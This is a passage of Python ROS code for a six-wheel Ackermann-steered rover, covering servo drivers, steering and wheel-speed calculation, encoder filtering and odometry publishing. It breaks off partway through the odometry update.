self._wheel_radius_multiplier = wheel_radius_multiplier
self._mid_wheel_lat_separation_multiplier = mid_wheel_lat_separation_multiplier
def _integrate_velocities(self, lin_vel, ang_vel):
''' Integrate the current velocities to obtain the current
position and heading.
Parameters
----------
lin_vel : float
The linear velocity of the `base_link`.
ang_vel : float
The angular velocity of the `base_link`.
'''
if math.fabs(ang_vel) < 1e-6:
self._integrate_runge_kutta2(lin_vel, ang_vel)
else:
            # Exact (arc) integration, valid when the angular velocity is not close to zero:
heading_old = self._heading
r = lin_vel/ang_vel
self._heading = self._heading + ang_vel
self._x = self._x + r * (math.sin(self._heading) - math.sin(heading_old))
self._y = self._y - r * (math.cos(self._heading) - math.cos(heading_old))
def _integrate_runge_kutta2(self, lin_vel, ang_vel):
''' Integrate the current velocities to obtain the current
position and heading.
Parameters
----------
lin_vel : float
The linear velocity of the `base_link`.
ang_vel : float
The angular velocity of the `base_link`.
'''
direction = self._heading + ang_vel * 0.5
# Runge-Kutta 2nd order integration:
self._x = self._x + lin_vel * math.cos(direction)
self._y = self._y + lin_vel * math.sin(direction)
self._heading = self._heading + ang_vel
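# Illustrative sketch (not used by the node): the closed-form pose update in
# _integrate_velocities above, written as a standalone function so the arc
# geometry can be checked in isolation. The function name is hypothetical and
# it relies on this module's existing `import math`.
def _example_exact_arc_integration(x, y, heading, lin_vel, ang_vel):
    ''' Return (x, y, heading) after one step of exact arc integration.
    lin_vel and ang_vel are per-step displacements, as in the class above.
    '''
    r = lin_vel / ang_vel                   # turning radius for this step
    new_heading = heading + ang_vel         # heading advances by the turn angle
    new_x = x + r * (math.sin(new_heading) - math.sin(heading))
    new_y = y - r * (math.cos(new_heading) - math.cos(heading))
    return new_x, new_y, new_heading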
class BaseController(object):
    ''' Mobile base controller for 6-wheel powered Ackermann steering.
    A 6-wheel Ackermann steering mobile base controller where each wheel
    is driven by a servo and there are 4 steering servos, one for each
    of the corner wheels.
The LX-16A servos may be position controlled through an
angle of 240 deg. This range is not enough to allow in-place
steering, so we specify an angle (REVERSE_SERVO_ANGLE) at which
the servos are reversed, so for example an angle of +130 deg is
reversed to an angle of 130 - 180 = -50 deg.
REVERSE_SERVO_ANGLE should be set to 90 deg.
Attributes
----------
    LINEAR_VEL_MAX : float
        The maximum linear velocity limit of the `base_link`
        (constant, 0.37 [m/s]).
    ANGULAR_VEL_MAX : float
        The maximum angular velocity limit of the `base_link`
        (constant, 1.45 [rad/s]).
    SERVO_ANG_VEL_MAX : float
        The maximum angular velocity limit of the servo
        (constant, 2 * pi [rad/s]).
    SERVO_DUTY_MAX : int
        The maximum duty for the servo (constant, 1000).
    REVERSE_SERVO_ANGLE : float
        The angle at which the servo is reversed by 180 deg
        (constant, 90 deg).
    SERVO_ANGLE_MAX : float
        Maximum (abs) angle at which the servo can be set
        (constant, 120 deg).
    SERVO_POS_MIN : int
        Minimum servo position in servo units (constant, 0).
    SERVO_POS_MAX : int
        Maximum servo position in servo units (constant, 1000).
    NUM_WHEELS : int
        The number of wheel servos (constant, 6).
    NUM_STEERS : int
        The number of steering servos (constant, 4).
ROS Parameters
--------------
~wheel_radius : float
The wheel radius [m]
~mid_wheel_lat_separation : float
The lateral distance [m] between the mid wheels
~front_wheel_lat_separation : float
The lateral distance [m] between the front wheels
~front_wheel_lon_separation : float
The longitudinal distance [m] from the front wheels to
the mid wheels.
~back_wheel_lat_separation : float
The lateral distance [m] between the back wheels
~back_wheel_lon_separation : float
The longitudinal distance [m] from the back wheels to
the mid wheels.
    ~wheel_radius_multiplier : float
        Wheel radius calibration multiplier to tune odometry
        (default = 1.0).
    ~mid_wheel_lat_separation_multiplier : float
        Wheel separation calibration multiplier to tune odometry
        (default = 1.0).
~wheel_servo_ids : list
An array of integer wheel servo serial ids : 0 - 253
~wheel_servo_lon_labels : list
        An array of wheel servo longitudinal position labels:
        'front', 'mid', 'back'
~wheel_servo_lat_labels : list
An array of wheel servo lateral position labels:
'left', 'right'
~steer_servo_ids : list
An array of integer steering servo serial ids : 0 - 253
~steer_servo_lon_labels : list
        An array of steering servo longitudinal position labels:
        'front', 'mid', 'back'
~steer_servo_lat_labels : list
An array of steering servo lateral position labels:
'left', 'right'
~steer_servo_angle_offsets : list
An array of integer steering servo angle adjustments,
        used to trim the steering angle.
~port : str
The device name for the serial port (e.g. /dev/ttyUSB0)
~baudrate : int
        The baudrate (default 115200).
    ~timeout : float
        The serial connection timeout in seconds (default 1.0).
~classifier_window : int
        The size of the classifier window; this sets the number of
        entries in the servo history used to train the classifier.
        The classifier and regressor models must correspond to this
        setting (default 10).
~classifier_filename : str
The full filepath for the `scikit-learn` classifier model.
~regressor_filename : str
The full filepath for the `scikit-learn` regressor model.
Publications
------------
odom : nav_msgs/Odometry
Publish the odometry.
tf : geometry_msgs/TransformStamped
        Broadcast the transform from `odom` to `base_link`
servo/encoders : curio_msgs/CurioServoEncoders
Publish servo encoder states
servo/states : curio_msgs/CurioServoStates
Publish the servo states
(Python serial only)
servo/commands : curio_msgs/CurioServoCommands
Publish servo commands to the servo controller
(Arduino serial only)
Subscriptions
-------------
cmd_vel : geometry_msgs/Twist
Subscribe to `cmd_vel`.
servo/positions : curio_msgs/CurioServoPositions
Subscribe to servo positions from the servo controller
(Arduino serial only)
'''
# Velocity limits for the rover
LINEAR_VEL_MAX = 0.37
ANGULAR_VEL_MAX = 1.45
# Servo limits - LX-16A has max angular velocity of approx 1 revolution per second
SERVO_ANG_VEL_MAX = 2 * math.pi
SERVO_DUTY_MAX = 1000
# Steering angle limits
REVERSE_SERVO_ANGLE = 90.0 # The angle at which we reverse the servo by 180 deg.
SERVO_ANGLE_MAX = 120.0 # Maximum (abs) angle at which the servo can be set.
SERVO_POS_MIN = 0.0 # Minimum servo position (servo units).
SERVO_POS_MAX = 1000.0 # Maximum servo position (servo units).
# 6 wheels, 4 steering.
NUM_WHEELS = 6
NUM_STEERS = 4
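    # Illustrative note (not part of the original controller): the reversal
    # described in the class docstring keeps steering angles within the
    # +/-SERVO_ANGLE_MAX range. For a requested steering angle of +130 deg
    # (> REVERSE_SERVO_ANGLE) the commanded angle becomes 130 - 180 = -50 deg;
    # for -130 deg it becomes 180 + (-130) = +50 deg. The wheel then lies along
    # the same steering line while the servo stays within its physical range.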
class PythonServoDriver(object):
''' Servo driver abstraction
'''
def __init__(self, wheel_servos, steer_servos):
''' Constructor
'''
self._wheel_servos = wheel_servos
self._steer_servos = steer_servos
# LX-16A servo driver - all parameters are required
rospy.loginfo('Opening connection to servo bus board...')
port = rospy.get_param('~port')
baudrate = rospy.get_param('~baudrate')
timeout = rospy.get_param('~timeout')
self._servo_driver = LX16ADriver()
self._servo_driver.set_port(port)
self._servo_driver.set_baudrate(baudrate)
self._servo_driver.set_timeout(timeout)
self._servo_driver.open()
rospy.loginfo('is_open: {}'.format(self._servo_driver.is_open()))
rospy.loginfo('port: {}'.format(self._servo_driver.get_port()))
rospy.loginfo('baudrate: {}'.format(self._servo_driver.get_baudrate()))
rospy.loginfo('timeout: {:.2f}'.format(self._servo_driver.get_timeout()))
# Publishers
self._states_msg = CurioServoStates()
self._states_pub = rospy.Publisher('servo/states', CurioServoStates, queue_size=10)
self._wheel_states = [LX16AState() for x in range(BaseController.NUM_WHEELS)]
self._steer_states = [LX16AState() for x in range(BaseController.NUM_STEERS)]
def set_steer_command(self, i, position):
''' Set the servo steering command
'''
servo = self._steer_servos[i]
self._servo_driver.servo_mode_write(servo.id)
self._servo_driver.move_time_write(servo.id, position, 50)
def set_wheel_command(self, i, duty):
''' Set the servo wheel command
'''
servo = self._wheel_servos[i]
state = self._wheel_states[i]
state.command = duty
self._servo_driver.motor_mode_write(servo.id, duty)
def publish_commands(self):
''' Publish the servo commands
'''
pass
def get_wheel_position(self, i):
''' Get the servo position for the i-th wheel
'''
servo = self._wheel_servos[i]
state = self._wheel_states[i]
pos = self._servo_driver.pos_read(servo.id)
state.position = pos
return pos
def set_angle_offset(self, i, deviation):
''' Set the steering angle offset (trim)
'''
servo = self._steer_servos[i]
self._servo_driver.angle_offset_adjust(servo.id, servo.offset)
# self._servo_driver.angle_offset_write(servo.id)
# @TODO: check and test
def update_states(self, time):
''' Update the servo states
Parameters
----------
time : rospy.Time
The current time.
'''
for i in range (BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
state = self._wheel_states[i]
state.id = servo.id
# state.temperature = self._servo_driver.temp_read(servo.id)
# state.voltage = self._servo_driver.vin_read(servo.id)
# state.angle_offset = self._servo_driver.angle_offset_read(servo.id)
state.mode = LX16AState.LX16A_MODE_MOTOR
for i in range (BaseController.NUM_STEERS):
servo = self._steer_servos[i]
state = self._steer_states[i]
state.id = servo.id
# state.temperature = self._servo_driver.temp_read(servo.id)
# state.voltage = self._servo_driver.vin_read(servo.id)
# state.angle_offset = self._servo_driver.angle_offset_read(servo.id)
state.mode = LX16AState.LX16A_MODE_SERVO
# @TODO: check and test
def publish_states(self, time):
''' Publish the servo states
Parameters
----------
time : rospy.Time
The current time.
'''
# Header
self._states_msg.header.stamp = time
            self._states_msg.header.frame_id = 'base_link'
# LX16A state
self._states_msg.wheel_servo_states = self._wheel_states
self._states_msg.steer_servo_states = self._steer_states
# Publish rover state
self._states_pub.publish(self._states_msg)
class ArduinoServoDriver(object):
''' Servo driver abstraction
'''
def __init__(self, wheel_servos, steer_servos):
''' Constructor
'''
self._wheel_servos = wheel_servos
self._steer_servos = steer_servos
# Servo positions
self._servo_pos_msg = CurioServoPositions()
self._servo_pos_msg.wheel_positions = [0 for i in range(BaseController.NUM_WHEELS)]
self._servo_pos_msg.steer_positions = [0 for i in range(BaseController.NUM_STEERS)]
self._servo_pos_sub = rospy.Subscriber('/servo/positions', CurioServoPositions, self._servo_pos_callback)
# Servo commands
self._servo_cmd_msg = CurioServoCommands()
self._servo_cmd_msg.wheel_commands = [0 for i in range(BaseController.NUM_WHEELS)]
self._servo_cmd_msg.steer_commands = [0 for i in range(BaseController.NUM_STEERS)]
self._servo_cmd_pub = rospy.Publisher('/servo/commands', CurioServoCommands, queue_size=10)
def set_steer_command(self, i, position):
''' Set the servo steering command
'''
self._servo_cmd_msg.steer_commands[i] = position
def set_wheel_command(self, i, duty):
''' Set the servo wheel command
'''
self._servo_cmd_msg.wheel_commands[i] = duty
def publish_commands(self):
''' Publish the servo commands
'''
self._servo_cmd_pub.publish(self._servo_cmd_msg)
def get_wheel_position(self, i):
''' Get the servo position for the i-th wheel
'''
return self._servo_pos_msg.wheel_positions[i]
def set_angle_offset(self, i, deviation):
''' Set the steering angle offset (trim)
'''
pass
def _servo_pos_callback(self, msg):
''' Callback for the subscription to `/servos/positions`.
Parameters
----------
msg : curio_msgs.msg/CurioServoStates
The message for the servo positions.
'''
self._servo_pos_msg = msg
def __init__(self):
''' Constructor
'''
rospy.loginfo('Initialising BaseController...')
# Wheel geometry on a flat surface - defaults
self._wheel_radius = 0.060
self._mid_wheel_lat_separation = 0.052
self._front_wheel_lat_separation = 0.047
self._front_wheel_lon_separation = 0.028
self._back_wheel_lat_separation = 0.047
self._back_wheel_lon_separation = 0.025
if rospy.has_param('~wheel_radius'):
self._wheel_radius = rospy.get_param('~wheel_radius')
if rospy.has_param('~mid_wheel_lat_separation'):
self._mid_wheel_lat_separation = rospy.get_param('~mid_wheel_lat_separation')
if rospy.has_param('~front_wheel_lat_separation'):
self._front_wheel_lat_separation = rospy.get_param('~front_wheel_lat_separation')
if rospy.has_param('~front_wheel_lon_separation'):
self._front_wheel_lon_separation = rospy.get_param('~front_wheel_lon_separation')
if rospy.has_param('~back_wheel_lat_separation'):
self._back_wheel_lat_separation = rospy.get_param('~back_wheel_lat_separation')
if rospy.has_param('~back_wheel_lon_separation'):
self._back_wheel_lon_separation = rospy.get_param('~back_wheel_lon_separation')
rospy.loginfo('wheel_radius: {:.2f}'.format(self._wheel_radius))
rospy.loginfo('mid_wheel_lat_separation: {:.2f}'.format(self._mid_wheel_lat_separation))
rospy.loginfo('front_wheel_lat_separation: {:.2f}'.format(self._front_wheel_lat_separation))
rospy.loginfo('front_wheel_lon_separation: {:.2f}'.format(self._front_wheel_lon_separation))
rospy.loginfo('back_wheel_lat_separation: {:.2f}'.format(self._back_wheel_lat_separation))
rospy.loginfo('back_wheel_lon_separation: {:.2f}'.format(self._back_wheel_lon_separation))
# Odometry calibration parameters
self._wheel_radius_multiplier = 1.0
self._mid_wheel_lat_separation_multiplier = 1.0
if rospy.has_param('~wheel_radius_multiplier'):
self._wheel_radius_multiplier = rospy.get_param('~wheel_radius_multiplier')
if rospy.has_param('~mid_wheel_lat_separation_multiplier'):
self._mid_wheel_lat_separation_multiplier = rospy.get_param('~mid_wheel_lat_separation_multiplier')
rospy.loginfo('wheel_radius_multiplier: {:.2f}'
.format(self._wheel_radius_multiplier))
rospy.loginfo('mid_wheel_lat_separation_multiplier: {:.2f}'
.format(self._mid_wheel_lat_separation_multiplier))
def calc_position(lon_label, lat_label):
''' Calculate servo positions using the wheel geometry parameters
'''
if lon_label == Servo.FRONT:
if lat_label == Servo.LEFT:
return [self._front_wheel_lon_separation, self._front_wheel_lat_separation/2.0]
if lat_label == Servo.RIGHT:
return [self._front_wheel_lon_separation, -self._front_wheel_lat_separation/2.0]
if lon_label == Servo.MID:
if lat_label == Servo.LEFT:
return [0.0, self._mid_wheel_lat_separation/2.0]
if lat_label == Servo.RIGHT:
return [0.0, -self._mid_wheel_lat_separation/2.0]
if lon_label == Servo.BACK:
if lat_label == Servo.LEFT:
return [-self._back_wheel_lon_separation, self._back_wheel_lat_separation/2.0]
if lat_label == Servo.RIGHT:
return [-self._back_wheel_lon_separation, -self._back_wheel_lat_separation/2.0]
return [0.0, 0.0]
# Utility for validating servo parameters
def validate_servo_param(param, name, expected_length):
if len(param) != expected_length:
rospy.logerr("Parameter '{}' must be an array length {}, got: {}"
.format(name, expected_length, len(param)))
exit()
# Wheel servo parameters - required
wheel_servo_ids = rospy.get_param('~wheel_servo_ids')
wheel_servo_lon_labels = rospy.get_param('~wheel_servo_lon_labels')
wheel_servo_lat_labels = rospy.get_param('~wheel_servo_lat_labels')
validate_servo_param(wheel_servo_ids, 'wheel_servo_ids', BaseController.NUM_WHEELS)
validate_servo_param(wheel_servo_lon_labels, 'wheel_servo_lon_labels', BaseController.NUM_WHEELS)
validate_servo_param(wheel_servo_lat_labels, 'wheel_servo_lat_labels', BaseController.NUM_WHEELS)
self._wheel_servos = []
for i in range(BaseController.NUM_WHEELS):
id = wheel_servo_ids[i]
lon_label = Servo.to_lon_label(wheel_servo_lon_labels[i])
lat_label = Servo.to_lat_label(wheel_servo_lat_labels[i])
orientation = 1 if lat_label == Servo.LEFT else -1
servo = Servo(id, lon_label, lat_label, orientation)
servo.position = calc_position(lon_label, lat_label)
self._wheel_servos.append(servo)
rospy.loginfo('servo: id: {}, lon_label: {}, lat_label: {}, orientation: {}, offset: {}, position: {}'
.format(servo.id, servo.lon_label, servo.lat_label, servo.orientation, servo.offset, servo.position))
# Steer servo parameters - required
steer_servo_ids = rospy.get_param('~steer_servo_ids')
steer_servo_lon_labels = rospy.get_param('~steer_servo_lon_labels')
steer_servo_lat_labels = rospy.get_param('~steer_servo_lat_labels')
steer_servo_angle_offsets = rospy.get_param('~steer_servo_angle_offsets')
validate_servo_param(steer_servo_ids, 'steer_servo_ids', BaseController.NUM_STEERS)
validate_servo_param(steer_servo_lon_labels, 'steer_servo_lon_labels', BaseController.NUM_STEERS)
validate_servo_param(steer_servo_lat_labels, 'steer_servo_lat_labels', BaseController.NUM_STEERS)
validate_servo_param(steer_servo_angle_offsets, 'steer_servo_angle_offsets', BaseController.NUM_STEERS)
self._steer_servos = []
for i in range(BaseController.NUM_STEERS):
id = steer_servo_ids[i]
lon_label = Servo.to_lon_label(steer_servo_lon_labels[i])
lat_label = Servo.to_lat_label(steer_servo_lat_labels[i])
orientation = -1
servo = Servo(id, lon_label, lat_label, orientation)
servo.offset = steer_servo_angle_offsets[i]
servo.position = calc_position(lon_label, lat_label)
self._steer_servos.append(servo)
rospy.loginfo('servo: id: {}, lon_label: {}, lat_label: {}, orientation: {}, offset: {}, position: {}'
.format(servo.id, servo.lon_label, servo.lat_label, servo.orientation, servo.offset, servo.position))
# Select whether to use the Python or Arduino servo driver
if ENABLE_ARDUINO_LX16A_DRIVER:
self._servo_driver = BaseController.ArduinoServoDriver(
self._wheel_servos, self._steer_servos)
else:
self._servo_driver = BaseController.PythonServoDriver(
self._wheel_servos, self._steer_servos)
# Commanded velocity
self._cmd_vel_timeout = rospy.Duration(0.5)
self._cmd_vel_last_rec_time = rospy.get_rostime()
self._cmd_vel_msg = Twist()
self._cmd_vel_sub = rospy.Subscriber('/cmd_vel', Twist, self._cmd_vel_callback)
# Tuning / calibration
rospy.loginfo('Setting steer servo offsets...')
self.set_steer_servo_offsets()
# Odometry
rospy.loginfo('Initialise odometry...')
self._odometry = AckermannOdometry()
self._odometry.reset(rospy.get_rostime())
self._odometry.set_wheel_params(
self._wheel_radius,
self._mid_wheel_lat_separation,
self._wheel_radius_multiplier,
self._mid_wheel_lat_separation_multiplier)
self._odom_msg = Odometry()
self._odom_pub = rospy.Publisher('/odom', Odometry, queue_size=10)
self._init_odometry()
# Encoder filters
self._classifier_window = rospy.get_param('~classifier_window', 10)
if not rospy.has_param('~classifier_filename'):
rospy.logerr('Missing parameter: classifier_filename. Exiting...')
self._classifier_filename = rospy.get_param('~classifier_filename')
if not rospy.has_param('~regressor_filename'):
rospy.logerr('Missing parameter: regressor_filename. Exiting...')
self._regressor_filename = rospy.get_param('~regressor_filename')
self._wheel_servo_duty = [0 for i in range(BaseController.NUM_WHEELS)]
self._encoder_filters = [
LX16AEncoderFilter(
classifier_filename = self._classifier_filename,
regressor_filename = self._regressor_filename,
window=self._classifier_window)
for i in range(BaseController.NUM_WHEELS)
]
for i in range(BaseController.NUM_WHEELS):
# Invert the encoder filters on the right side
servo = self._wheel_servos[i]
if servo.lat_label == Servo.RIGHT:
self._encoder_filters[i].set_invert(True)
self._reset_encoders()
# Encoder messages (primarily for debugging)
self._encoders_msg = CurioServoEncoders()
self._encoders_pub = rospy.Publisher('/servo/encoders', CurioServoEncoders, queue_size=10)
self._wheel_encoders = [LX16AEncoder() for i in range(BaseController.NUM_WHEELS)]
# Transform
self._odom_broadcaster = TransformBroadcaster()
def move(self, lin_vel, ang_vel):
''' Move the robot given linear and angular velocities
for the base.
The linear and angular velocity arguments refer to the robot's
base_link reference frame. We assume that the base_link origin
is located at the mid-point between the two middle
(non-steering) wheels.
The velocities and separation of the middle wheels are used to
determine a turning radius and rate of turn. Given this the
velocity and steering angle are then calculated for each wheel.
Parameters
----------
lin_vel : float
The linear velocity of base_link frame [m/s].
ang_vel : float
The angular velocity of base_link frame [rad/s].
'''
# Check for timeout
has_timed_out = rospy.get_rostime() > self._cmd_vel_last_rec_time + self._cmd_vel_timeout
# Calculate the turning radius and rate
r_p, omega_p = turning_radius_and_rate(lin_vel, ang_vel, self._mid_wheel_lat_separation)
rospy.logdebug('r_p: {:.2f}, omega_p: {:.2f}'.format(r_p, omega_p))
# Calculate velocity and steering angle for each wheel
wheel_vel_max = 0.0
wheel_lin_vel = []
steer_angle = []
if omega_p == 0:
# Body frame has no angular velocity - set wheel velocity directly
vel = 0.0 if has_timed_out else lin_vel
wheel_vel_max = math.fabs(vel)
for servo in self._wheel_servos:
wheel_lin_vel.append(vel)
for servo in self._steer_servos:
steer_angle.append(0.0)
else:
for servo in self._wheel_servos:
# Wheel position
id = servo.id
x = servo.position[0]
y = servo.position[1]
# Wheel turn radius
r = math.sqrt(x*x + (r_p - y)*(r_p - y))
# Wheel velocity
sgn = -1 if (r_p - y) < 0 else 1
vel = sgn * r * omega_p
vel = 0.0 if has_timed_out else vel
wheel_vel_max = max(wheel_vel_max, math.fabs(vel))
wheel_lin_vel.append(vel)
# rospy.logdebug("id: {}, r: {:.2f}, wheel_lin_vel: {:.2f}".format(id, r, vel))
for servo in self._steer_servos:
# Wheel position
id = servo.id
x = servo.position[0]
y = servo.position[1]
# Wheel angle
angle = math.atan2(x, (r_p - y))
steer_angle.append(angle)
# rospy.logdebug("id: {}, angle: {:.2f}".format(id, degree(angle)))
# Apply speed limiter - preserving turning radius
if wheel_vel_max > BaseController.LINEAR_VEL_MAX:
speed_limiter_sf = BaseController.LINEAR_VEL_MAX / wheel_vel_max
for i in range(len(wheel_lin_vel)):
wheel_lin_vel[i] = wheel_lin_vel[i] * speed_limiter_sf
# Update steer servos
# @TODO link the time of the move to the angle which the servos turn through
rospy.logdebug('Updating steer servos')
for i in range(BaseController.NUM_STEERS):
servo = self._steer_servos[i]
# Input angles are in radians
angle_deg = degree(steer_angle[i])
# Transition from turning radius outside the base footprint to inside
# (i.e in-place turning)
if angle_deg > BaseController.REVERSE_SERVO_ANGLE:
angle_deg = angle_deg - 180
if angle_deg < -BaseController.REVERSE_SERVO_ANGLE:
angle_deg = 180 + angle_deg
# Map steering angle degrees [-120, 120] to servo position [0, 1000]
servo_pos = int(map(angle_deg * servo.orientation,
-BaseController.SERVO_ANGLE_MAX, BaseController.SERVO_ANGLE_MAX,
BaseController.SERVO_POS_MIN, BaseController.SERVO_POS_MAX))
rospy.logdebug('id: {}, angle: {:.2f}, servo_pos: {}'.format(servo.id, angle_deg, servo_pos))
self._servo_driver.set_steer_command(i, servo_pos)
# Update wheel servos
rospy.logdebug('Updating wheel servos')
for i in range(BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
# Wheel angular velocity
wheel_ang_vel = wheel_lin_vel[i] / self._wheel_radius
# Map speed to servo duty [-1000, 1000]
duty = int(map(wheel_ang_vel * servo.orientation,
-BaseController.SERVO_ANG_VEL_MAX, BaseController.SERVO_ANG_VEL_MAX,
-BaseController.SERVO_DUTY_MAX, BaseController.SERVO_DUTY_MAX))
# Set servo speed
rospy.logdebug('id: {}, wheel_ang_vel: {:.2f}, servo_vel: {}'
.format(servo.id, wheel_ang_vel, duty))
self._servo_driver.set_wheel_command(i, duty)
# Update duty array (needed for servo position classifier)
self._wheel_servo_duty[i] = duty
# Publish the servo command
self._servo_driver.publish_commands()
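    # Illustrative worked example (not executed): using the default geometry
    # above, a front-left wheel sits at (x, y) ~= (0.028, 0.0235). For a
    # turning radius r_p = 0.5 m the formulas in move() give
    #     r     = sqrt(0.028**2 + (0.5 - 0.0235)**2) ~= 0.477 m
    #     angle = atan2(0.028, 0.5 - 0.0235)         ~= 0.059 rad (~3.4 deg)
    # so outer wheels run on a larger radius and steer through a smaller angle
    # than inner wheels, all sharing the same turn centre.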
def set_steer_servo_offsets(self):
''' Set angle offsets for the steering servos.
        The offsets are specified in the node parameters and are
        adjusted to ensure each corner wheel is centred when the robot
        is commanded to move with no turn.
'''
# Set the steering servo offsets to centre the corner wheels
for i in range(BaseController.NUM_STEERS):
servo = self._steer_servos[i]
rospy.loginfo('id: {}, offset: {}'.format(servo.id, servo.offset))
self._servo_driver.set_angle_offset(i, servo.offset)
def stop(self):
''' Stop all servos
'''
rospy.loginfo('Stopping all servos')
for i in range(BaseController.NUM_WHEELS):
self._servo_driver.set_wheel_command(i, 0)
self._servo_driver.publish_commands()
def _cmd_vel_callback(self, msg):
''' Callback for the subscription to `/cmd_vel`.
The callback updates the current command, and also a watchdog
timer so that if cmd_vel messages stop, the motors stop.
Parameters
----------
msg : geometry_msgs.msg/Twist
The message for the commanded velocity.
'''
rospy.logdebug('cmd_vel: linear: {}, angular: {}'.format(msg.linear.x, msg.angular.z))
self._cmd_vel_last_rec_time = rospy.get_rostime()
self._cmd_vel_msg = msg
def _servo_pos_callback(self, msg):
''' Callback for the subscription to `/servos/positions`.
Parameters
----------
msg : curio_msgs.msg/CurioServoStates
The message for the servo positions.
'''
self._servo_pos_msg = msg
def update(self, event):
''' Callback for the control loop.
        This is to be called at the control loop frequency by the node's
main function, usually managed by a rospy.Timer.
Parameters
----------
event : rospy.Timer
A rospy.Timer event.
See http://wiki.ros.org/rospy/Overview/Time for details.
'''
# Get the current real time (just before this function was called)
time = event.current_real
# Read and publish
self._update_odometry(time)
self._publish_odometry(time)
self._publish_tf(time)
self._publish_encoders(time)
# PID control would go here...
# Write commands
self.move(self._cmd_vel_msg.linear.x, self._cmd_vel_msg.angular.z)
def update_state(self, event):
''' Callback for the status update loop.
        This is to be called at the status update frequency by the node's
main function, usually managed by a rospy.Timer.
Parameters
----------
event : rospy.Timer
A rospy.Timer event.
'''
# Get the current real time (just before this function
# was called)
time = event.current_real
self._update_state(time)
self._publish_states(time)
def shutdown(self):
''' Called by the node shutdown hook on exit.
'''
# Stop all servos - @TODO add e-stop with latch.
self.stop()
####################################################################
# Odometry related
def _reset_encoders(self):
''' Reset the encoders
'''
# Reset encoder filters
for i in range(BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
filter = self._encoder_filters[i]
pos = self._servo_driver.get_wheel_position(i)
filter.reset(pos)
# @TODO: Gives errors when running at low control loop update rate
# (e.g. < 15Hz).
#
# The error is because the encoder filter is not updated fast enough
# to make two measurements close enough in time either side of a
# discontinuity in the servo position to see a jump of 1000-1400
    # counts. Instead the encoder suffers from aliasing. As a result the
    # odometry will work at low velocities and then suddenly fail as the
    # velocity is increased.
#
def _update_all_wheel_servo_positions(self, time):
''' Get the servo positions in radians for all wheels.
Parameters
----------
time : rospy.Time
The current time.
Returns
-------
list
A list of 6 floats containing the angular position
of each of the wheel servos [rad].
'''
servo_positions = [0 for i in range(BaseController.NUM_WHEELS)]
msg = 'time: {}, '.format(time)
for i in range (BaseController.NUM_WHEELS):
servo = self._wheel_servos[i]
filter = self._encoder_filters[i]
# Calculate the encoder count
duty = self._wheel_servo_duty[i]
pos = self._servo_driver.get_wheel_position(i)
filter.update(time, duty, pos)
count = filter.get_count()
theta = filter.get_angular_position()
servo_positions[i] = theta
# Append to debug message
msg = msg + "{}: {}, ".format(servo.id, count)
rospy.loginfo(msg)
return servo_positions
def _update_mid_wheel_servo_positions(self, time):
''' Update the servo positions in radians for the
left and right mid wheels.
Parameters
----------
time : rospy.Time
The current time.
Returns
-------
list
A list of 2 floats containing the angular position
of the left and right mid wheel servos [rad].
'''
# @TODO: resolve hardcoded index
left_pos = self._update_wheel_servo_position(time, 1)
right_pos = self._update_wheel_servo_position(time, 4)
servo_positions = [0 for i in range(2)]
servo_positions[Servo.LEFT] = left_pos
servo_positions[Servo.RIGHT] = right_pos
rospy.logdebug("time: {}, left: {}, right: {}".format(time, left_pos, right_pos))
return servo_positions
def _update_wheel_servo_position(self, time, i):
''' Update the servo positions in radians for the i-th wheel.
Parameters
----------
time : rospy.Time
The current time.
i : int
The index of the i-th wheel.
Returns
-------
float
The angular position of the wheel servo [rad].
'''
servo = self._wheel_servos[i]
filter = self._encoder_filters[i]
# Calculate the encoder count
duty = self._wheel_servo_duty[i]
pos = self._servo_driver.get_wheel_position(i)
filter.update(time, duty, pos)
count = filter.get_count()
theta = filter.get_angular_position()
return theta
def _init_odometry(self):
''' Initialise the odometry
Initialise the time independent parameters of the
odometry message.
'''
odom_frame_id = 'odom'
base_frame_id = 'base_link'
pose_cov_diag = [0.01, 0.01, 0.01, 0.01, 0.01, 0.01]
twist_cov_diag = [0.01, 0.01, 0.01, 0.01, 0.01, 0.01]
self._odom_msg.header.frame_id = odom_frame_id
self._odom_msg.child_frame_id = base_frame_id
self._odom_msg.pose.pose.position.y = 0.0
self._odom_msg.pose.covariance = [
pose_cov_diag[0], 0., 0., 0., 0., 0.,
0., pose_cov_diag[1], 0., 0., 0., 0.,
0., 0., pose_cov_diag[2], 0., 0., 0.,
0., 0., 0., pose_cov_diag[3], 0., 0.,
0., 0., 0., 0., pose_cov_diag[4], 0.,
0., 0., 0., 0., 0., pose_cov_diag[5]
]
self._odom_msg.twist.twist.linear.y = 0.0
self._odom_msg.twist.twist.linear.z = 0.0
self._odom_msg.twist.twist.angular.x = 0.0
self._odom_msg.twist.twist.angular.y = 0.0
self._odom_msg.twist.covariance = [
twist_cov_diag[0], 0., 0., 0., 0., 0.,
0., twist_cov_diag[1], 0., 0., 0., 0.,
0., 0., twist_cov_diag[2], 0., 0., 0.,
0., 0., 0., twist_cov_diag[3], 0., 0.,
0., 0., 0., 0., twist_cov_diag[4], 0.,
0., 0., 0., 0., 0., twist_cov_diag[5]
]
def _publish_odometry(self, time):
''' Populate the nav_msgs.Odometry message and publish.
Parameters
----------
time : rospy.Time
The current time.
'''
# rospy.loginfo('x: {:.2f}, y: {:.2f}, heading: {:.2f}, lin_vel: {:.2f}, ang_vel: {:.2f}'
# .format(
# self._odometry.get_x(),
# self._odometry.get_y(),
# self._odometry.get_heading(),
# self._odometry.get_lin_vel(),
# self._odometry.get_ang_vel()))
quat = quaternion_from_euler(0.0, 0.0, self._odometry.get_heading())
self._odom_msg.header.stamp = time
self._odom_msg.pose.pose.position.x = self._odometry.get_x()
self._odom_msg.pose.pose.position.y = self._odometry.get_y()
self._odom_msg.pose.pose.orientation.x = quat[0]
self._odom_msg.pose.pose.orientation.y = quat[1]
self._odom_msg.pose.pose.orientation.z = quat[2]
self._odom_msg.pose.pose.orientation.w = quat[3]
self._odom_msg.twist.twist.linear.x = self._odometry.get_lin_vel()
self._odom_msg.twist.twist.angular.z = self._odometry.get_ang_vel()
self._odom_pub.publish(self._odom_msg)
def _update_odometry(self, time):
''' Update odometry
This is the same calculation as used in the odometry
for the ackermann_drive_controller.
Parameters
----------
time : rospy.Time
The current time.
'''
# Get the angular position of the all wheel servos [rad] and
# update odometry
# wheel_servo_pos = self._update_all_wheel_servo_positions(time)
# self._odometry.update_6(wheel_servo_pos, time)
# Get the angular position of the mid wheel servos [rad]
# and update odometry
wheel_servo_pos = self._update_mid_wheel_servo_positions(time)
